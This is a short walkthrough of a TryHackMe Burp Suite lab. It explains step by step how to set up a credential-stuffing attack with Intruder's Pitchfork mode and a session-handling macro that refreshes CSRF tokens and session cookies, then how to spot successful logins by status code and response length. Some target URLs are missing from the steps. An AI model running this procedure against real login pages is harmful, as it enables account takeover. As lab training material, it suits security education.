Setting up Macro for intruder

The provided text describes an advanced credential-stuffing attack using Burp Suite's Intruder and Macro functionalities. To execute this, follow these instructions:

Setting Up the Request Capture:

  1. Start by capturing a login request to

  2. Note the response, especially the session cookie and CSRF token, which are dynamic.

Configuring the Intruder:

  1. With the Burp Proxy, intercept and capture the login request.

  2. In Intruder, set up the attack:

    • Use the "Pitchfork" attack type.

    • Only select the username and password fields, leaving the session cookie and CSRF token fields unselected.

Loading Payloads:

  1. Go to the Payloads tab in Intruder.

  2. Load your username and password wordlists.

Setting Up the Macro:

  1. Navigate to the "Settings" tab and select "Sessions".

  2. Under "Macros," add a new macro.

    • Choose a GET request to from your history.

    • Name the macro appropriately.

Configuring Session Handling Rules:

  1. Under "Session Handling Rules," add a new rule.

  2. In the Scope tab:

    • Enable only for Intruder.

    • Set URL scope to "Use suite scope" or define a custom scope for

  3. In the Details tab, under "Rule Actions":

    • Add the "Run a Macro" action.

    • Select the macro you created.

    • Specify to update only the "loginToken" parameter and the "session" cookie.

Launching the Attack:

  1. Return to Intruder and start the attack.

  2. Monitor for 302 status code responses; 403 errors indicate a problem with the macro.

  3. Sort responses by length to identify successful login attempts, which should be notably shorter

This lab Credit goes to Try Hack Me on Burp Intruder Page TASK 12: The Extra Mile.

Last updated